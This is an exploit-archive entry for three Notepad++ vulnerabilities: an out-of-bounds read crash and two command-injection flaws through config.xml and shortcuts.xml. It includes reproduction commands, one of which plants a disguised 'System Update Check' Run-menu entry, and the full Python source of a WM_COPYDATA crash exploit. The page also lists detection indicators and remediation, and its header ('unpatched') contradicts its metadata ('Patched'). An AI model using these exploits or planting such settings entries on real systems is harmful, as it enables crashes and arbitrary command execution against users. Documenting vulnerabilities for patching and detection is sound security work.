PoC Archive PoC Archive
High CVE-2026-48770, CVE-2026-48778, CVE-2026-48800 unpatched

Notepad++ <= 8.9.6 Multiple Vulnerabilities (CVE-2026-48770, CVE-2026-48778, CVE-2026-48800)

by atiilla · 2026-05-28

Metadata

FieldValue
Date Added2026-05-28
Last UpdatedN/A
Author / Researcheratiilla
CVE / AdvisoryCVE-2026-48770, CVE-2026-48778, CVE-2026-48800
Categorybinary
SeverityHigh
CVSS Score5.0 / 7.8 / 7.8
StatusPatched
TagsNotepad++, Windows, OOB-read, DoS, command-injection, config.xml, shortcuts.xml, local
RelatedN/A

Affected Target

FieldValue
Software / SystemNotepad++
Versions AffectedNotepad++ <= 8.9.6
Language / PlatformPython, PowerShell, XML payloads on Windows 10/11
Authentication RequiredPartial (local user/session interaction)
Network Access RequiredLocal only

Summary

This PoC set covers three Notepad++ vulnerabilities affecting versions up to 8.9.6. CVE-2026-48770 demonstrates an out-of-bounds read crash by sending malformed WM_COPYDATA data to a running Notepad++ process. CVE-2026-48778 and CVE-2026-48800 demonstrate command execution by controlling values loaded from config.xml and shortcuts.xml, then triggering Notepad++ UI actions that pass attacker-controlled values to process launch functionality.


Vulnerability Details

Root Cause

  • CVE-2026-48770: unsafe message handling for WM_COPYDATA (dwData=3) allows reading beyond expected bounds when input is not properly terminated.
  • CVE-2026-48778: commandLineInterpreter from %APPDATA%\\Notepad++\\config.xml is trusted and later invoked through UI flow without sufficient validation.
  • CVE-2026-48800: <UserDefinedCommands> entries from %APPDATA%\\Notepad++\\shortcuts.xml are loaded and passed to command execution paths without sanitization.

Attack Vector

  1. CVE-2026-48770: attacker process in the same interactive Windows session sends crafted WM_COPYDATA to a running Notepad++ instance.
  2. CVE-2026-48778: attacker-controlled config.xml (direct overwrite or -settingsDir) is loaded; user triggers File -> Open Containing Folder -> cmd.
  3. CVE-2026-48800: attacker-controlled shortcuts.xml (direct overwrite or -settingsDir) is loaded; user clicks injected command in the Run menu.

Impact

  • CVE-2026-48770: application crash / denial of service.
  • CVE-2026-48778: arbitrary command execution in user context.
  • CVE-2026-48800: arbitrary command execution in user context.

Environment / Lab Setup

OS:          Windows 10/11
Target:      Notepad++ <= 8.9.6
Attacker:    Authorized local tester in same session
Tools:       Python 3.x, PowerShell, Notepad++

Setup Steps

1
2
3
python poc_CVE-2026-48770.py
python poc_CVE-2026-48778.py --mode direct --payload calc.exe
python poc_CVE-2026-48800.py --mode direct --payload calc.exe --name "System Update Check"

Proof of Concept

Step-by-Step Reproduction

  1. CVE-2026-48770 (crash)

    1
    2
    3
    
    powershell -ExecutionPolicy Bypass -File payloads\poc_CVE-2026-48770.ps1
    # or:
    python poc_CVE-2026-48770.py
    
  2. CVE-2026-48778 (config.xml command execution)

    1
    2
    3
    
    python poc_CVE-2026-48778.py --mode direct --payload calc.exe
    # Trigger in Notepad++: File -> Open Containing Folder -> cmd
    python poc_CVE-2026-48778.py --mode direct --restore
    
  3. CVE-2026-48800 (shortcuts.xml command execution)

    1
    2
    3
    
    python poc_CVE-2026-48800.py --mode direct --payload calc.exe --name "System Update Check"
    # Restart Notepad++, then click Run -> System Update Check
    python poc_CVE-2026-48800.py --mode direct --restore
    

Exploit Code

See poc_CVE-2026-48770.py, poc_CVE-2026-48778.py, and poc_CVE-2026-48800.py in this folder.

Expected Output

[+] Found Notepad++ HWND: 0x000A08B4
[*] Sending malformed WM_COPYDATA (dwData=3, cbData=8192, no NUL terminator)...
[+] SendMessageTimeout returned 0 - Notepad++ likely crashed (OOB read -> 0xc0000005)

Screenshots / Evidence

  • Upstream repository includes a demo animation (demo.gif) showing CVE-2026-48778 trigger flow.
  • Add local lab screenshots under screenshots/ if additional evidence is needed.

Detection & Indicators of Compromise

- Unexpected changes to %APPDATA%\Notepad++\config.xml or shortcuts.xml
- Unexpected process execution (for example calc.exe) spawned from Notepad++ UI actions
- Crash events for notepad++.exe with access violation signatures around WM_COPYDATA handling

Remediation

ActionDetail
PatchUpdate Notepad++ to 8.9.6.1 or later
WorkaroundRestrict write access to %APPDATA%\\Notepad++ files; avoid loading untrusted settings directories
Config HardeningMonitor/alert on suspicious changes to config.xml and shortcuts.xml; enforce application allowlisting

References


Notes

Auto-ingested from https://github.com/atiilla/Notepad-8.9.6-PoC on 2026-05-28.

poc_CVE-2026-48770.py
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
#!/usr/bin/env python3
# CVE-2026-48770 - Notepad++ OOB Read via WM_COPYDATA (crash PoC)
import ctypes
import ctypes.wintypes
import sys

WM_COPYDATA = 0x004A
SMTO_ABORTIFHUNG = 0x0002

class COPYDATASTRUCT(ctypes.Structure):
    _fields_ = [
        ("dwData", ctypes.wintypes.LPARAM),
        ("cbData", ctypes.wintypes.DWORD),
        ("lpData", ctypes.c_void_p),
    ]

user32 = ctypes.windll.user32

hwnd = user32.FindWindowW("Notepad++", None)
if not hwnd:
    print("[-] Notepad++ not found - open it first")
    sys.exit(1)
print(f"[+] Found Notepad++ HWND: 0x{hwnd:08X}")

cbData = 8192
buf = ctypes.create_string_buffer(b"\x41" * cbData)  # no NUL terminator

cds = COPYDATASTRUCT()
cds.dwData = 3
cds.cbData = cbData
cds.lpData = ctypes.cast(buf, ctypes.c_void_p).value

print(f"[*] Sending malformed WM_COPYDATA (dwData=3, cbData={cbData}, no NUL terminator)...")

result = ctypes.wintypes.DWORD(0)
ret = user32.SendMessageTimeoutW(
    hwnd, WM_COPYDATA, 0, ctypes.byref(cds),
    SMTO_ABORTIFHUNG, 2000, ctypes.byref(result)
)

if ret == 0:
    print("[+] SendMessageTimeout returned 0 - Notepad++ likely crashed (OOB read -> 0xc0000005)")
else:
    print(f"[-] No crash (ret={ret}) - may be patched")